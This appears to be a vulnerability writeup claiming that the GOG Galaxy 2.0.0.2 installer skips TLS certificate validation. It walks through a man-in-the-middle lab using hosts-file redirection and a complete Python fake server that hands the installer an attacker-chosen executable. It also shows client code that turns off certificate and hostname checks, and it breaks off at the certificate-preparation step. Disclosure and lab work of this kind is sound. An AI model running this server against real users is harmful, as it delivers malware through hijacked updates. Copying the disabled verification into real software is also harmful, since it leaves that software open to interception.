GOG Galaxy 2.0.0.2
Local test environment: Windows 10
Running the installer risks being hijacked by a man-in-the-middle, which leads to RCE!
Missing SSL/TLS certificate validation = "RCE"
While the GOG installation package runs, it actively sends requests to the following servers:
[GET] https://remote-config.gog.com/components/webinstaller?component_version=2.0.0
[GET] https://content-system.gog.com/open_link/download?path=/open/galaxy/client/setup_galaxy_2.0.88.15.exe
These requests fetch files over HTTPS (configuration and update information). The problem is that the fetch performs no security verification at all: the authenticity of the source is not checked, and the server's certificate is not validated.
An attacker can therefore deliver a malicious webinstaller file to the client via DNS hijacking, a man-in-the-middle position, etc. Further analysis showed that the downloaded setup executable is run by the client, which an attacker can use to trigger remote code execution (RCE).
The core of this vulnerability chain is: the remote files can be controlled by an unauthorized party + HTTPS certificate validation is missing + the downloaded files carry no integrity or signature check of their own. The chain can be exploited remotely without the user noticing anything.
Reproduction requires one host or virtual machine acting as the user, plus a second host or virtual machine acting as the fake server.
To keep it simple, the user's hosts file is edited directly so that the relevant domain names resolve to the fake server's IP address:
192.168.146.1 remote-config.gog.com
192.168.146.1 content-system.gog.com
At the same time, the fake server runs the corresponding HTTPS service on port 443.
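The fake-server side of the setup above, as an added example (not code from the original writeup, and nothing GOG ships). It answers the two requests the installer makes with a config document and an attacker-chosen executable, and it models the client side to show why the missing validation is the whole story. Assumptions, all labelled in the code: the self-signed certificate and key produced in the certificate step are named server.crt and server.key, the replacement executable is payload.exe, and the JSON shape returned for /components/webinstaller is a guess (capture the genuine response first and modify that instead of trusting this layout).

```python
"""Fake GOG config/update server for the MITM lab described above.

Added example, not part of the original writeup. Assumed files next to this
script: server.crt / server.key (self-signed, from the certificate step) and
payload.exe (attacker-controlled replacement for setup_galaxy_*.exe).
"""
import http.server
import json
import ssl
from urllib.parse import parse_qs, urlsplit

CERT_FILE = "server.crt"      # assumption: self-signed cert from the cert step
KEY_FILE = "server.key"       # assumption: matching private key
PAYLOAD_EXE = "payload.exe"   # assumption: attacker-controlled EXE to deliver
BIND = ("0.0.0.0", 443)       # both hijacked hostnames resolve here via hosts

# Hostnames the installer contacts, taken from the writeup.
HIJACKED_HOSTS = {"remote-config.gog.com", "content-system.gog.com"}


def build_response(host, raw_path, payload):
    """Decide what the fake server returns for one request.

    Returns (status, content_type, body). The installer's own two requests map
    to a config document and to the attacker's EXE; everything else gets 404 so
    the server log only shows the interesting traffic.
    """
    host = host.split(":")[0].lower()          # strip an optional :port
    parts = urlsplit(raw_path)
    query = parse_qs(parts.query)
    if host not in HIJACKED_HOSTS:
        return 404, "text/plain", b"unknown host\n"
    if parts.path == "/components/webinstaller":
        # Assumed response shape: steer the client to the hijacked download URL.
        body = json.dumps({
            "component_version": query.get("component_version", ["2.0.0"])[0],
            "download_url": "https://content-system.gog.com/open_link/download"
                            "?path=/open/galaxy/client/setup_galaxy_2.0.88.15.exe",
        }).encode()
        return 200, "application/json", body
    if parts.path == "/open_link/download":
        # Whatever path= the client asks for, hand back the attacker's EXE.
        return 200, "application/octet-stream", payload
    return 404, "text/plain", b"not found\n"


class FakeGogHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        try:
            with open(PAYLOAD_EXE, "rb") as f:
                payload = f.read()
        except OSError:
            payload = b""                     # no payload staged yet
        status, ctype, body = build_response(
            self.headers.get("Host", ""), self.path, payload)
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def client_context(validate):
    """Model the client side of the bug.

    validate=True  -> the default context: CA chain verified and hostname
                      checked, so the fake server's self-signed cert is
                      rejected and the chain breaks at the TLS handshake.
    validate=False -> no verification at all, the behaviour this writeup
                      exploits: any certificate, any name, is accepted.
    """
    if validate:
        return ssl.create_default_context()
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False                # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def serve():
    """Run the fake server over TLS with the self-signed certificate."""
    httpd = http.server.HTTPServer(BIND, FakeGogHandler)
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(CERT_FILE, KEY_FILE)
    httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    httpd.serve_forever()


if __name__ == "__main__":
    serve()
```

Start it on the fake-server machine with root privileges (port 443), then run the installer on the user machine whose hosts file points both names here. The contrast in client_context is the check a practitioner should look for when triaging a client like this: with the default context the self-signed certificate fails the handshake and no file is ever downloaded; with verification disabled the installer happily pulls payload.exe.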
✅ Step 1: Prepare the certificate